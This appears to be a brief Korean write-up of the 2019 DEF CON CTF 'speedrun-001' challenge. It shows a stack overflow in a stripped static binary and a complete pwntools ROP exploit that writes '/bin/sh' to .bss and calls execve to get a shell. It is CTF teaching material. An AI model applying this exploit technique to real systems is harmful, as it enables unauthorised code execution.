2019 Defcon CTF speedrun-001

statically linked이고 stripped 돼있다.

speedrun-001: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=e9266027a3231c31606a432ec4eb461073e1ffa9, stripped

여기가 main인거같다. 그냥 bof터진다. RELRO는 Partial이고 NX걸려있다.

__int64 sub_400B60()
{
  char buf; // [rsp+0h] [rbp-400h]

  sub_410390("Any last words?");
  sub_4498A0(0, &buf, 0x7D0uLL);
  return sub_40F710("This will be the last thing that you say: %s\n");
}

stripped 되어있어서 syscall 가져와서 익스해주면 된다. syscall gadget은 그냥 널려있는데 read syscall을 이용했다.

bss영역에 /bin/sh\x00 을 넣어주고 execve 로 쉘따면된다.

exploit.py

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
e = ELF('./speedrun-001')
p = process('./speedrun-001')
prax = 0x0000000000415664 # pop rax ; ret
prdi = 0x0000000000400686 # pop rdi ; ret
prsi = 0x00000000004101f3 # pop rsi ; ret
prdx = 0x00000000004498b5 # pop rdx ; ret
main = 0x0000000000400B60
syscall = 0x00000000004498AC

payload = '\x90'*1024
payload += 'realsung'
payload += p64(prax) + p64(0)
payload += p64(prdi) + p64(0)
payload += p64(prsi) + p64(e.bss())
payload += p64(prdx) + p64(10)
payload += p64(syscall)
payload += p64(main)

p.sendlineafter('Any last words?',payload)
p.sendline('/bin/sh\x00')

payload2 = '\x90'*1024
payload2 += 'realsung'
payload2 += p64(prax) + p64(59)
payload2 += p64(prdi) + p64(e.bss())
payload2 += p64(prsi) + p64(0)
payload2 += p64(prdx) + p64(0)
payload2 += p64(syscall)

p.sendlineafter('Any last words?',payload2)

p.interactive()